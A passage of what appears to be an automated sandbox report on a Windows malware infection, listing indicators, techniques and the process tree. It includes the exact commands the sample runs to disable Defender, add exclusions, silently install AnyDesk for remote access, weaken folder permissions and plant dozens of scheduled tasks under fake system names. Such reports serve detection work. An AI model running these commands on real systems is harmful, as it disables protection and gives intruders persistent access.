Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\System.exe\""	ComdriverSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Drops file in Program Files directory 10 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Program Files\7-Zip\7a0fd90576e088	ComdriverSvc.exe
File created	C:\Program Files\Windows Defender\en-US\lsass.exe	ComdriverSvc.exe
File created	C:\Program Files\Uninstall Information\timeout.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Sidebar\es-ES\Idle.exe	ComdriverSvc.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\services.exe	ComdriverSvc.exe
File created	C:\Program Files\7-Zip\explorer.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Defender\en-US\6203df4a6bafc7	ComdriverSvc.exe
File created	C:\Program Files\Uninstall Information\22381bee9c04b1	ComdriverSvc.exe
File created	C:\Program Files (x86)\Windows Sidebar\es-ES\6ccacd8608530f	ComdriverSvc.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\c5b4cb5e9653cc	ComdriverSvc.exe

Drops file in Windows directory 4 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Windows\tracing\winlogon.exe	ComdriverSvc.exe
File created	C:\Windows\tracing\cc11b995f2a76d	ComdriverSvc.exe
File created	C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\conhost.exe	ComdriverSvc.exe
File created	C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\088424020bedd6	ComdriverSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1680	schtasks.exe
1516	schtasks.exe
2252	schtasks.exe
2420	schtasks.exe
2592	schtasks.exe
1728	schtasks.exe
2232	schtasks.exe
2316	schtasks.exe
2404	schtasks.exe
2516	schtasks.exe
2492	schtasks.exe
2556	schtasks.exe
764	schtasks.exe
776	schtasks.exe
2068	schtasks.exe
2096	schtasks.exe
2660	schtasks.exe
1480	schtasks.exe
908	schtasks.exe
2188	schtasks.exe
2272	schtasks.exe
2340	schtasks.exe
2616	schtasks.exe
2684	schtasks.exe
1716	schtasks.exe
544	schtasks.exe
2472	schtasks.exe
2640	schtasks.exe
1540	schtasks.exe
1352	schtasks.exe
2208	schtasks.exe
2356	schtasks.exe
2448	schtasks.exe
792	schtasks.exe
760	schtasks.exe
1960	schtasks.exe
1460	schtasks.exe
2120	schtasks.exe
2164	schtasks.exe
2296	schtasks.exe
2708	schtasks.exe
1812	schtasks.exe
1144	schtasks.exe
360	schtasks.exe
1164	schtasks.exe
2140	schtasks.exe
2384	schtasks.exe
2540	schtasks.exe

Delays execution with timeout.exe 11 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1364	timeout.exe
2088	timeout.exe
2860	timeout.exe
2304	timeout.exe
2100	timeout.exe
2624	timeout.exe
1648	timeout.exe
960	timeout.exe
2648	timeout.exe
924	timeout.exe
3052	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

952 tasklist.exe
2988 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1716 taskkill.exe
1956 taskkill.exe

pid	process
952	tasklist.exe
2988	tasklist.exe

pid	process
1716	taskkill.exe
1956	taskkill.exe

Modifies registry class 16 IoCs

Processes:

wsappz.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exe1.exepowershell.exewsappz.exeAnyDesk.exeschtasks.exeComdriverSvc.exe

pid	process
1336	powershell.exe
972	powershell.exe
520	1.exe
520	1.exe
520	1.exe
520	1.exe
380	powershell.exe
1168	wsappz.exe
1168	wsappz.exe
1536	AnyDesk.exe
1960	schtasks.exe
1484	ComdriverSvc.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exe1.exeschtasks.exetaskkill.exepowershell.exeschtasks.exeComdriverSvc.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	520	1.exe
Token: SeAssignPrimaryTokenPrivilege	520	1.exe
Token: SeIncreaseQuotaPrivilege	520	1.exe
Token: 0	520	1.exe
Token: SeDebugPrivilege	1716	schtasks.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	380	powershell.exe
Token: SeDebugPrivilege	1960	schtasks.exe
Token: SeDebugPrivilege	1484	ComdriverSvc.exe
Token: SeDebugPrivilege	952	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AnyDesk.exe

pid process

604 AnyDesk.exe
604 AnyDesk.exe
604 AnyDesk.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDesk.exe

pid process

604 AnyDesk.exe
604 AnyDesk.exe
604 AnyDesk.exe

pid	process
604	AnyDesk.exe
604	AnyDesk.exe
604	AnyDesk.exe

pid	process
604	AnyDesk.exe
604	AnyDesk.exe
604	AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exeschtasks.execmd.exeany.execmd.exedc.exenet.exeschtasks.exe

description	pid	process	target process
PID 1504 wrote to memory of 1336	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 1336	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 1336	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 1336	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 972	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 972	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 972	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 972	1504	tmp.exe	powershell.exe
PID 1504 wrote to memory of 520	1504	tmp.exe	1.exe
PID 1504 wrote to memory of 520	1504	tmp.exe	1.exe
PID 1504 wrote to memory of 520	1504	tmp.exe	1.exe
PID 1504 wrote to memory of 520	1504	tmp.exe	1.exe
PID 1504 wrote to memory of 544	1504	tmp.exe	schtasks.exe
PID 1504 wrote to memory of 544	1504	tmp.exe	schtasks.exe
PID 1504 wrote to memory of 544	1504	tmp.exe	schtasks.exe
PID 1504 wrote to memory of 544	1504	tmp.exe	schtasks.exe
PID 1504 wrote to memory of 1084	1504	tmp.exe	any.exe
PID 1504 wrote to memory of 1084	1504	tmp.exe	any.exe
PID 1504 wrote to memory of 1084	1504	tmp.exe	any.exe
PID 1504 wrote to memory of 1084	1504	tmp.exe	any.exe
PID 544 wrote to memory of 1800	544	schtasks.exe	cmd.exe
PID 544 wrote to memory of 1800	544	schtasks.exe	cmd.exe
PID 544 wrote to memory of 1800	544	schtasks.exe	cmd.exe
PID 544 wrote to memory of 1800	544	schtasks.exe	cmd.exe
PID 1504 wrote to memory of 1580	1504	tmp.exe	dc.exe
PID 1504 wrote to memory of 1580	1504	tmp.exe	dc.exe
PID 1504 wrote to memory of 1580	1504	tmp.exe	dc.exe
PID 1504 wrote to memory of 1580	1504	tmp.exe	dc.exe
PID 1800 wrote to memory of 1552	1800	cmd.exe	chcp.com
PID 1800 wrote to memory of 1552	1800	cmd.exe	chcp.com
PID 1800 wrote to memory of 1552	1800	cmd.exe	chcp.com
PID 1800 wrote to memory of 1552	1800	cmd.exe	chcp.com
PID 1084 wrote to memory of 1608	1084	any.exe	cmd.exe
PID 1084 wrote to memory of 1608	1084	any.exe	cmd.exe
PID 1084 wrote to memory of 1608	1084	any.exe	cmd.exe
PID 1084 wrote to memory of 1608	1084	any.exe	cmd.exe
PID 1800 wrote to memory of 1648	1800	cmd.exe	timeout.exe
PID 1800 wrote to memory of 1648	1800	cmd.exe	timeout.exe
PID 1800 wrote to memory of 1648	1800	cmd.exe	timeout.exe
PID 1800 wrote to memory of 1648	1800	cmd.exe	timeout.exe
PID 1608 wrote to memory of 1364	1608	cmd.exe	timeout.exe
PID 1608 wrote to memory of 1364	1608	cmd.exe	timeout.exe
PID 1608 wrote to memory of 1364	1608	cmd.exe	timeout.exe
PID 1608 wrote to memory of 1364	1608	cmd.exe	timeout.exe
PID 1580 wrote to memory of 892	1580	dc.exe	WScript.exe
PID 1580 wrote to memory of 892	1580	dc.exe	WScript.exe
PID 1580 wrote to memory of 892	1580	dc.exe	WScript.exe
PID 1580 wrote to memory of 892	1580	dc.exe	WScript.exe
PID 1608 wrote to memory of 1996	1608	cmd.exe	net.exe
PID 1608 wrote to memory of 1996	1608	cmd.exe	net.exe
PID 1608 wrote to memory of 1996	1608	cmd.exe	net.exe
PID 1608 wrote to memory of 1996	1608	cmd.exe	net.exe
PID 1996 wrote to memory of 1784	1996	net.exe	net1.exe
PID 1996 wrote to memory of 1784	1996	net.exe	net1.exe
PID 1996 wrote to memory of 1784	1996	net.exe	net1.exe
PID 1996 wrote to memory of 1784	1996	net.exe	net1.exe
PID 1608 wrote to memory of 1812	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 1812	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 1812	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 1812	1608	cmd.exe	schtasks.exe
PID 1812 wrote to memory of 1452	1812	schtasks.exe	net1.exe
PID 1812 wrote to memory of 1452	1812	schtasks.exe	net1.exe
PID 1812 wrote to memory of 1452	1812	schtasks.exe	net1.exe
PID 1812 wrote to memory of 1452	1812	schtasks.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
PID:1756

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1580

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
PID:544

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\any.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\SysWOW64\chcp.com
chcp 65001
2⤵
PID:1364

C:\Windows\SysWOW64\net.exe
net stop TaskSc
2⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
3⤵
PID:1784

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
2⤵
PID:1352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
3⤵
PID:1596

C:\Windows\SysWOW64\net.exe
net stop TaskScs
2⤵
PID:1812

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
2⤵
- Kills process with taskkill
PID:1716

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
3⤵
- Loads dropped DLL
PID:1844

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1168

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
2⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
3⤵
PID:2604

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
2⤵
PID:1736

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:2088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
2⤵
PID:2400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
3⤵
PID:1712

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:2560

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:2624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
2⤵
PID:2284

C:\Windows\SysWOW64\find.exe
find /n /v ""
3⤵
PID:2324

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
1⤵
- Delays execution with timeout.exe
PID:1648

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
1⤵
PID:892

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\runtimeMonitor\PsYm20I.bat" "
2⤵
- Loads dropped DLL
PID:1284

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
4⤵
PID:2772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
4⤵
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
4⤵
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
4⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
4⤵
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
4⤵
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
4⤵
PID:2824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
4⤵
PID:2892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
4⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'
4⤵
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
4⤵
PID:2956

C:\Windows\SysWOW64\chcp.com
chcp 65001
1⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
2⤵
PID:1972

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
2⤵
PID:1808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2⤵
PID:1960

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
2⤵
PID:624

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1812

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:960

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2308

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1884

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:452

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2460

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2488

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2552

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:764

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:1364

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
2⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\tasks\run.bat" "
3⤵
PID:2192

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3052

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
4⤵
PID:1072

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2304

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2100

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
4⤵
PID:1460

C:\Windows\SysWOW64\net.exe
net start WMService
4⤵
PID:2468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
5⤵
PID:2448

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:2860

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 60 /NOBREAK
2⤵
- Delays execution with timeout.exe
PID:2648

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
2⤵
PID:2176

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
2⤵
- Enumerates processes with tasklist
PID:2988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
1⤵
PID:1452

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1536

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Windows\tracing\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\7-Zip\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\tracing\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\tracing\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Users\Default\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 11 /tr "'C:\Users\Default\timeout.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 14 /tr "'C:\Users\Default\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-US\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\en-US\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\runtimeMonitor\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2068

C:\Windows\system32\schtasks.exe
